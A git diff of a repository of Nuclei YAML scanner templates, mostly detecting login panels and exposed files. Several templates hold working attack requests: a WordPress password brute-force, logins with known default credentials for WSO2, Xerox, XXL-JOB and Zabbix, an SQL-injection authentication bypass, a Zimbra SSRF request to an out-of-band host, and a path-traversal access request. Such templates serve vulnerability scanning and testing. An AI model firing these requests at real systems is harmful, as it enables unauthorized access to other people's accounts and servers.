HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/wordpress-login.yaml b/poc/auth/wordpress-login.yaml index 0372801292..7fecc16e01 100644 --- a/poc/auth/wordpress-login.yaml +++ b/poc/auth/wordpress-login.yaml @@ -1,13 +1,23 @@ id: wordpress-login + info: - name: WordPress login + name: WordPress Login Panel - Detect author: its0x08 severity: info + description: WordPress login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-login.php" + matchers: - type: word words: @@ -16,3 +26,5 @@ requests: - '/wp-login.php?action=lostpassword">Lost your password?' - '
' condition: or + +# digest: 4b0a0048304602210086807236a145972b89ecdaa833fe7f59fac5c4d3babd16cb539f81c3c8b6b603022100c24de61f99e5153228b3e5c418c3297c3adf10667ceb11498b4fe452e80528f7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wordpress-updraftplus-pem-key.yaml b/poc/auth/wordpress-updraftplus-pem-key.yaml index fdc0197b59..60ce155fd0 100644 --- a/poc/auth/wordpress-updraftplus-pem-key.yaml +++ b/poc/auth/wordpress-updraftplus-pem-key.yaml @@ -1,20 +1,15 @@ id: updraftplus-pem-keys - info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info reference: - https://www.exploit-db.com/ghdb/6437 - metadata: - max-request: 1 - tags: wp-plugin,edb,wordpress - -http: + tags: wordpress,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "updraftplus" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100f67881c034eb94b3163dd7e7e724002d05ef5d68777ecabd4a0f6e1ddaec2b4a022100eaa8e0704e2f22d863e7eafda11a6a3fedd0088891a706f52eb74c79fa6a1a9c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wordpress-weak-credentials-11336.yaml b/poc/auth/wordpress-weak-credentials-11336.yaml new file mode 100644 index 0000000000..a4747ae6ab --- /dev/null +++ b/poc/auth/wordpress-weak-credentials-11336.yaml @@ -0,0 +1,43 @@ +id: wordpress-weak-credentials +info: + name: WordPress - Weak Credentials + author: evolutionsec + severity: critical + description: | + Weak WordPress Credentials were discovered. + reference: + - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: wordpress,default-login,fuzz +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/auth/wordpress-weak-credentials-11337.yaml b/poc/auth/wordpress-weak-credentials-11337.yaml deleted file mode 100644 index 0bec5f6f85..0000000000 --- a/poc/auth/wordpress-weak-credentials-11337.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: wordpress-weak-credentials - -info: - name: WordPress Weak Credentials - author: evolutionsec - severity: critical - tags: wordpress,default-login,fuzz - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} - - log={{users}}&pwd={{passwords}} - - payloads: - users: helpers/wordlists/wp-users.txt - passwords: helpers/wordlists/wp-passwords.txt - threads: 50 - attack: clusterbomb - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - words: - - '/wp-admin' - - 'wordpress_logged_in' - condition: and - part: header \ No newline at end of file diff --git a/poc/auth/wordpress-weak-credentials.yaml b/poc/auth/wordpress-weak-credentials.yaml index a4747ae6ab..9b2b887072 100644 --- a/poc/auth/wordpress-weak-credentials.yaml +++ b/poc/auth/wordpress-weak-credentials.yaml @@ -1,4 +1,5 @@ id: wordpress-weak-credentials + info: name: WordPress - Weak Credentials author: evolutionsec @@ -8,11 +9,14 @@ info: reference: - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-1391 + metadata: + max-request: 276 tags: wordpress,default-login,fuzz -requests: + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -22,12 +26,14 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} + payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -36,8 +42,9 @@ requests: - '/wp-admin' - 'wordpress_logged_in' condition: and + - type: status status: - 302 -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402206feaee39a07459925f48bcc9cadb2289ad56e2df23d9e1a6f44a5fec39b3e48d02202b1343c19604a13ccf017c07b3bffca05a5abe6fe91b604d99acf57af94797d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wpdm-cache-session-11436.yaml b/poc/auth/wpdm-cache-session-11436.yaml new file mode 100644 index 0000000000..ba8153e31e --- /dev/null +++ b/poc/auth/wpdm-cache-session-11436.yaml @@ -0,0 +1,23 @@ +id: wpdm-cache-session +info: + name: Wpdm-Cache Session + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/ghdb/7004 + tags: wordpress +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' + matchers-condition: and + matchers: + - type: word + words: + - "Index of /" + - ".txt" + - "wpdm-cache" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/auth/wpdm-cache-session-11438.yaml b/poc/auth/wpdm-cache-session-11438.yaml deleted file mode 100644 index 9e12c4ad90..0000000000 --- a/poc/auth/wpdm-cache-session-11438.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wpdm-cache-session -info: - name: Wpdm-Cache Session - author: dhiyaneshDk - severity: medium - reference: - - https://www.exploit-db.com/ghdb/7004 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' - matchers-condition: and - matchers: - - type: word - words: - - "Index of /" - - ".txt" - - "wpdm-cache" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/wso2-default-login.yaml b/poc/auth/wso2-default-login.yaml deleted file mode 100644 index 8353ac6595..0000000000 --- a/poc/auth/wso2-default-login.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wso2-default-login -info: - name: WSO2 Management Console Default Login - author: cocxanh - severity: high - description: WSO2 Management Console default admin credentials were discovered. - reference: - - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console - - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: default-login,wso2 -requests: - - raw: - - | - POST /carbon/admin/login_action.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - redirects: false - matchers: - - type: word - words: - - "/carbon/admin/index.jsp?loginStatus=true" - - "JSESSIONID" - part: header - condition: and - -# Enhanced by mp on 2022/04/05 diff --git a/poc/auth/xenforo-login-11674.yaml b/poc/auth/xenforo-login-11674.yaml deleted file mode 100644 index e53b25cba9..0000000000 --- a/poc/auth/xenforo-login-11674.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: xenforo-login -info: - name: XenForo Login/Register - author: dhiyaneshDk - severity: info - metadata: - shodan-query: http.title:"XenForo" - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/index.php' - matchers: - - type: word - words: - - 'XenForo' - condition: and diff --git a/poc/auth/xenmobile-login-11675.yaml b/poc/auth/xenmobile-login-11675.yaml new file mode 100644 index 0000000000..22d3ffb99d --- /dev/null +++ b/poc/auth/xenmobile-login-11675.yaml @@ -0,0 +1,19 @@ +id: xenmobile-login +info: + name: Xenmobile Console Logon + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6675 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/zdm/login_xdm_uc.jsp' + matchers-condition: and + matchers: + - type: word + words: + - 'XenMobile - Console - Logon' + - type: status + status: + - 200 diff --git a/poc/auth/xenmobile-login-11677.yaml b/poc/auth/xenmobile-login-11677.yaml deleted file mode 100644 index ffc22629f8..0000000000 --- a/poc/auth/xenmobile-login-11677.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: xenmobile-login -info: - name: Xenmobile Console Logon - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6675 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/zdm/login_xdm_uc.jsp' - matchers-condition: and - matchers: - - type: word - words: - - 'XenMobile - Console - Logon' - - type: status - status: - - 200 diff --git a/poc/auth/xenmobile-login.yaml b/poc/auth/xenmobile-login.yaml index 3322731279..ffc22629f8 100644 --- a/poc/auth/xenmobile-login.yaml +++ b/poc/auth/xenmobile-login.yaml @@ -1,33 +1,20 @@ id: xenmobile-login - info: - name: Xenmobile Console Login Panel - Detect + name: Xenmobile Console Logon author: dhiyaneshDK severity: info - description: Xenmobile Console login panel was detected. reference: - https://www.exploit-db.com/ghdb/6675 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,edb - -http: + tags: panel +requests: - method: GET path: - '{{BaseURL}}/zdm/login_xdm_uc.jsp' - matchers-condition: and matchers: - type: word words: - 'XenMobile - Console - Logon' - - type: status status: - 200 - -# digest: 4a0a00473045022100ee07e6d41d6fa7d50bc7b8d7ba974c03b0bfff35a861538af9900d875089f633022019d8daa7c7c909f8a33be42af6160812b5e4c99c902949157e7f0ec7db1b395d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/xerox7-default-login-11679.yaml b/poc/auth/xerox7-default-login-11679.yaml index 56e300388a..7582cc1fa1 100644 --- a/poc/auth/xerox7-default-login-11679.yaml +++ b/poc/auth/xerox7-default-login-11679.yaml @@ -1,13 +1,16 @@ id: xerox7-default-login - info: - name: Xerox WorkCentre 7xxx - Default Login + name: Xerox WorkCentre 7xxx Printer Default Login author: MiroslavSotak severity: high - description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer. + description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: xerox,default-login - reference: https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 - requests: - raw: - | @@ -16,31 +19,29 @@ requests: Content-Type: application/x-www-form-urlencoded _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default - attack: pitchfork payloads: username: - admin password: - 1111 - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - "window.opener.top.location.pathname" - "Xerox Corporation" condition: and - - type: word part: body words: - "invalid" - "errmsg" condition: or - negative: true \ No newline at end of file + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/xerox7-default-login.yaml b/poc/auth/xerox7-default-login.yaml new file mode 100644 index 0000000000..56e300388a --- /dev/null +++ b/poc/auth/xerox7-default-login.yaml @@ -0,0 +1,46 @@ +id: xerox7-default-login + +info: + name: Xerox WorkCentre 7xxx - Default Login + author: MiroslavSotak + severity: high + description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer. + tags: xerox,default-login + reference: https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + +requests: + - raw: + - | + POST /userpost/xerox.set HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default + + attack: pitchfork + payloads: + username: + - admin + password: + - 1111 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "window.opener.top.location.pathname" + - "Xerox Corporation" + condition: and + + - type: word + part: body + words: + - "invalid" + - "errmsg" + condition: or + negative: true \ No newline at end of file diff --git a/poc/auth/xvr-login-11704.yaml b/poc/auth/xvr-login-11704.yaml index d638c70dd8..13f9f39ce6 100644 --- a/poc/auth/xvr-login-11704.yaml +++ b/poc/auth/xvr-login-11704.yaml @@ -1,20 +1,24 @@ id: xvr-login + info: name: XVR LOGIN author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"XVR LOGIN" + reference: + - https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 tags: panel,xvr + requests: - method: GET path: - '{{BaseURL}}/login.rsp' + matchers-condition: and matchers: - type: word words: - 'XVR LOGIN' + - type: status status: - 200 diff --git a/poc/auth/xvr-login-11705.yaml b/poc/auth/xvr-login-11705.yaml new file mode 100644 index 0000000000..ce1449f791 --- /dev/null +++ b/poc/auth/xvr-login-11705.yaml @@ -0,0 +1,20 @@ +id: xvr-login +info: + name: XVR LOGIN + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 + tags: panel,xvr +requests: + - method: GET + path: + - '{{BaseURL}}/login.rsp' + matchers-condition: and + matchers: + - type: word + words: + - 'XVR LOGIN' + - type: status + status: + - 200 diff --git a/poc/auth/xxljob-default-login-11709.yaml b/poc/auth/xxljob-default-login-11709.yaml deleted file mode 100644 index 5fead39967..0000000000 --- a/poc/auth/xxljob-default-login-11709.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: xxljob-default-login - -info: - name: XXL-JOB Default Login - author: pdteam - severity: high - tags: default-login,xxljob - description: XXL-JOB default admin credentials were discovered. - reference: - - https://github.com/xuxueli/xxl-job - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - POST /xxl-job-admin/login HTTP/1.1 - Host:{{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - userName={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - 123456 - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - '"code":200' - - '"msg"' - - '"content"' - condition: and - - - type: word - words: - - 'application/json' - - 'XXL_JOB_LOGIN_IDENTITY' - part: header - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/xxljob-default-login-11712.yaml b/poc/auth/xxljob-default-login-11712.yaml index 11e08ec55c..e7972df7bd 100644 --- a/poc/auth/xxljob-default-login-11712.yaml +++ b/poc/auth/xxljob-default-login-11712.yaml @@ -1,12 +1,16 @@ id: xxljob-default-login - info: name: XXL-JOB Default Login author: pdteam severity: high + description: XXL-JOB default admin credentials were discovered. + reference: + - https://github.com/xuxueli/xxl-job + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,xxljob - reference: https://github.com/xuxueli/xxl-job - requests: - raw: - | @@ -15,14 +19,12 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName={{username}}&password={{password}} - payloads: username: - admin password: - 123456 attack: pitchfork - matchers-condition: and matchers: - type: word @@ -31,14 +33,14 @@ requests: - '"msg"' - '"content"' condition: and - - type: word words: - 'application/json' - 'XXL_JOB_LOGIN_IDENTITY' part: header condition: and - - type: status status: - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/zabbix-default-credentials.yaml b/poc/auth/zabbix-default-credentials.yaml index da0f08e602..246a9ed52a 100644 --- a/poc/auth/zabbix-default-credentials.yaml +++ b/poc/auth/zabbix-default-credentials.yaml @@ -1,11 +1,9 @@ id: zabbix-default-credentials - info: name: Zabbix Default Credentials author: pdteam severity: critical tags: zabbix,default-login - requests: - method: POST path: @@ -13,15 +11,12 @@ requests: headers: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - body: name=Admin&password=zabbix&autologin=1&enter=Sign+in - matchers-condition: and matchers: - type: word words: - "zabbix.php?action=dashboard.view" - - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/poc/auth/zabbix-server-login-11767.yaml b/poc/auth/zabbix-server-login-11767.yaml index 44aa8646f2..a78a6b03b3 100644 --- a/poc/auth/zabbix-server-login-11767.yaml +++ b/poc/auth/zabbix-server-login-11767.yaml @@ -3,7 +3,8 @@ info: name: Zabbix Login author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 tags: panel,zabbix requests: - method: GET diff --git a/poc/auth/zabbix-server-login-11769.yaml b/poc/auth/zabbix-server-login-11769.yaml new file mode 100644 index 0000000000..aa225ec9d5 --- /dev/null +++ b/poc/auth/zabbix-server-login-11769.yaml @@ -0,0 +1,23 @@ +id: zabbix-server-login + +info: + name: Zabbix Login + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + tags: panel,zabbix + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "zabbix-server: Zabbix" + - type: status + status: + - 200 diff --git a/poc/auth/zeroshell-login-11788.yaml b/poc/auth/zeroshell-login-11788.yaml new file mode 100644 index 0000000000..1f3fb79b7b --- /dev/null +++ b/poc/auth/zeroshell-login-11788.yaml @@ -0,0 +1,20 @@ +id: zeroshell-login +info: + name: ZeroShell Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"ZeroShell"' + tags: panel,zeroshell +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'ZeroShell' + - type: status + status: + - 200 diff --git a/poc/auth/zeroshell-login-11790.yaml b/poc/auth/zeroshell-login-11790.yaml deleted file mode 100644 index 690b4d8c41..0000000000 --- a/poc/auth/zeroshell-login-11790.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: zeroshell-login -info: - name: ZeroShell Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"ZeroShell" - tags: panel,zeroshell -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'ZeroShell' - - type: status - status: - - 200 diff --git a/poc/auth/zeroshell-login.yaml b/poc/auth/zeroshell-login.yaml index 1f3fb79b7b..19e56fec49 100644 --- a/poc/auth/zeroshell-login.yaml +++ b/poc/auth/zeroshell-login.yaml @@ -1,20 +1,32 @@ id: zeroshell-login + info: - name: ZeroShell Login + name: ZeroShell Panel - Detect author: dhiyaneshDK severity: info + description: ZeroShell panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"ZeroShell"' + max-request: 1 + shodan-query: http.title:"ZeroShell" tags: panel,zeroshell -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'ZeroShell' + - type: status status: - 200 + +# digest: 4b0a00483046022100e334b7100e2310a5bcbdf4aa1eab82088cfdeeaf31cd53f3a2b69f766a70fbbd022100981de431f87e4d06d38a8d5805cb16ce10f3a6da957ad08002d92432d8017ea0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/zhiyuan-oa-session-leak-11802.yaml b/poc/auth/zhiyuan-oa-session-leak-11802.yaml new file mode 100644 index 0000000000..382a4c4ca9 --- /dev/null +++ b/poc/auth/zhiyuan-oa-session-leak-11802.yaml @@ -0,0 +1,22 @@ +id: zhiyuan-oa-session-leak +info: + name: Zhiyuan OA Session Leak + author: pikpikcu + severity: medium + description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. + reference: https://www.zhihuifly.com/t/topic/3345 + tags: zhiyuan,leak,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll" + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/zhiyuan-oa-session-leak-11801.yaml b/poc/auth/zhiyuan-oa-session-leak.yaml similarity index 100% rename from poc/auth/zhiyuan-oa-session-leak-11801.yaml rename to poc/auth/zhiyuan-oa-session-leak.yaml diff --git a/poc/auth/zhiyuan-oa-unauthorized-11806.yaml b/poc/auth/zhiyuan-oa-unauthorized-11806.yaml new file mode 100644 index 0000000000..b6c35dfbf4 --- /dev/null +++ b/poc/auth/zhiyuan-oa-unauthorized-11806.yaml @@ -0,0 +1,25 @@ +id: zhiyuan-oa-unauthorized +info: + name: Zhiyuan Oa Unauthorized + author: pikpikcu + severity: low + reference: https://buaq.net/go-53721.html + tags: seeyon,unauth,zhiyuan +requests: + - method: GET + path: + - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" + matchers-condition: and + matchers: + - type: word + words: + - "serverIdentifier" + - "companyName" + condition: and + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/poc/auth/zhiyuan-oa-unauthorized-11808.yaml b/poc/auth/zhiyuan-oa-unauthorized-11808.yaml deleted file mode 100644 index 7b0f97c9ef..0000000000 --- a/poc/auth/zhiyuan-oa-unauthorized-11808.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: zhiyuan-oa-unauthorized -info: - name: Zhiyuan Oa Unauthorized - author: pikpikcu - severity: low - reference: - - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan -requests: - - method: GET - path: - - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" - matchers-condition: and - matchers: - - type: word - words: - - "serverIdentifier" - - "companyName" - condition: and - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/poc/auth/zimbra-preauth-ssrf-11810.yaml b/poc/auth/zimbra-preauth-ssrf-11810.yaml index 8f955e0f3f..8b36af2c60 100644 --- a/poc/auth/zimbra-preauth-ssrf-11810.yaml +++ b/poc/auth/zimbra-preauth-ssrf-11810.yaml @@ -1,11 +1,17 @@ id: zimbra-preauth-ssrf info: - name: Zimbra Collaboration Suite (ZCS) - SSRF + name: Zimbra Collaboration Suite - Server-Side Request Forgery author: gy741 - severity: critical - description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + severity: medium + description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 tags: zimbra,ssrf,oast requests: - raw: @@ -18,3 +24,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/06/03 diff --git a/poc/auth/zimbra-preauth-ssrf.yaml b/poc/auth/zimbra-preauth-ssrf.yaml new file mode 100644 index 0000000000..8f955e0f3f --- /dev/null +++ b/poc/auth/zimbra-preauth-ssrf.yaml @@ -0,0 +1,20 @@ +id: zimbra-preauth-ssrf +info: + name: Zimbra Collaboration Suite (ZCS) - SSRF + author: gy741 + severity: critical + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + reference: + - https://www.adminxe.com/2183.html + tags: zimbra,ssrf,oast +requests: + - raw: + - | + GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/auth/zms-auth-bypass-11830.yaml b/poc/auth/zms-auth-bypass-11830.yaml new file mode 100644 index 0000000000..3ec26ec197 --- /dev/null +++ b/poc/auth/zms-auth-bypass-11830.yaml @@ -0,0 +1,33 @@ +id: zms-auth-bypass +info: + name: Zoo Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. + reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms +requests: + - raw: + - | + POST /zms/admin/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} + + username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= + redirects: true + max-redirects: 1 + matchers-condition: and + matchers: + - type: regex + regex: + - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" + - "ZMS ADMIN" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/auth/zms-auth-bypass-11832.yaml b/poc/auth/zms-auth-bypass-11832.yaml deleted file mode 100644 index 6c0bd3f73f..0000000000 --- a/poc/auth/zms-auth-bypass-11832.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: zms-auth-bypass -info: - name: Zoo Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. - reference: - - https://www.exploit-db.com/exploits/48880 - tags: auth-bypass,zms -requests: - - raw: - - | - POST /zms/admin/index.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/zms/admin/index.php - Cookie: PHPSESSID={{randstr}} - - username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= - redirects: true - max-redirects: 1 - matchers-condition: and - matchers: - - type: regex - regex: - - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" - - "ZMS ADMIN" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/zoho-webhook-token-11835.yaml b/poc/auth/zoho-webhook-token-11835.yaml index 7dd146b904..f3aa557a4a 100644 --- a/poc/auth/zoho-webhook-token-11835.yaml +++ b/poc/auth/zoho-webhook-token-11835.yaml @@ -3,7 +3,7 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,zoho requests: - method: GET path: diff --git a/poc/aws/amazon-docker-config-280.yaml b/poc/aws/amazon-docker-config-280.yaml deleted file mode 100644 index e1863a01a9..0000000000 --- a/poc/aws/amazon-docker-config-280.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: amazon-docker-config - -info: - name: Dockerrun AWS Configuration Page - Detect - author: pdteam - severity: medium - description: Dockerrun AWS configuration page was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure,aws,devops - -http: - - method: GET - path: - - '{{BaseURL}}/Dockerrun.aws.json' - - matchers: - - type: word - words: - - 'AWSEBDockerrunVersion' - - 'containerDefinitions' - condition: and - -# digest: 